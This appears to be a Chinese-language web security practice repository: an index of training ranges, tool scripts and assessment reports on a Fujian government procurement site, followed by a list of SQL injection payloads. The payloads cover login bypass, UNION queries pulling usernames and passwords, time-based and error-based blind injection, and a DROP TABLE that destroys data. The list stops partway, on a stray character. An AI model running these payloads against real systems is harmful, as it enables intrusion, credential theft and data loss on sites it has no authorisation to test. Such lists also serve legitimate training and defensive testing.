- 靶场环境: DVWA/WebGoat/Pikachu/BWAPP/SQLi-Labs/XSS-Labs
- SQL注入工具: sqli-scanner.py, blind-sqli.py, sqli-exploit.go
- XSS工具: xss-fuzzer.py, xss-scanner.go
- 认证攻击: web-brute.py, jwt-cracker.py
- 服务端安全: port-scanner.py, tls-scanner.py
- 防御配置: nginx-hardening.conf
- 案例研究: 福建政采网安全评估报告 (13份)
- 同步脚本: sync-gitea.sh
' OR '1'='1
' OR '1'='1'-- -
' OR '1'='1'/*
' OR 1=1--
' OR 1=1-- -
' OR 1=1/*
1' OR '1'='1
1' OR '1'='1'-- -
1' OR '1'='1'/*
admin'--
admin'-- -
admin'/*
' AND 1=1--
' AND 1=1-- -
' AND 1=2--
' AND 1=2-- -
' UNION SELECT NULL--
' UNION SELECT NULL-- -
' UNION SELECT NULL, NULL--
' UNION SELECT NULL, NULL, NULL--
' UNION SELECT 1,2,3--
' UNION SELECT username,password,3 FROM users--
' UNION ALL SELECT NULL--
' UNION ALL SELECT 1,2,3--
1' ORDER BY 1-- -
1' ORDER BY 2-- -
1' ORDER BY 3-- -
1' ORDER BY 4-- -
-1' UNION SELECT 1,2,3-- -
-1' UNION SELECT username,password,3 FROM users-- -
' AND SLEEP(5)--
' AND SLEEP(5)-- -
' AND IF(1=1,SLEEP(5),0)--
' AND IF(1=1,SLEEP(5),0)-- -
' AND BENCHMARK(10000000,SHA1('test'))--
' AND BENCHMARK(10000000,SHA1('test'))-- -
' WAITFOR DELAY '0:0:5'--
' WAITFOR DELAY '0:0:5'-- -
' AND pg_sleep(5)--
' AND pg_sleep(5)-- -
'; DROP TABLE users--
'; DROP TABLE users-- -
' AND 1=CONVERT(int,(SELECT TOP 1 table_name FROM information_schema.tables))--
' AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT version()),0x7e))--
' AND UPDATEXML(1,CONCAT(0x7e,(SELECT version()),0x7e),1)--
' AND (SELECT * FROM (SELECT COUNT(*),CONCAT((SELECT version()),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--
1 AND 1=1
1 AND 1=2
1 OR 1=1
1' AND '1'='1
1' AND '1'='2
" OR "1"="1
" OR 1=1--
') OR ('1'='1
') OR ('1'='1'-- -
') AND 1=1--
') AND 1=2-- |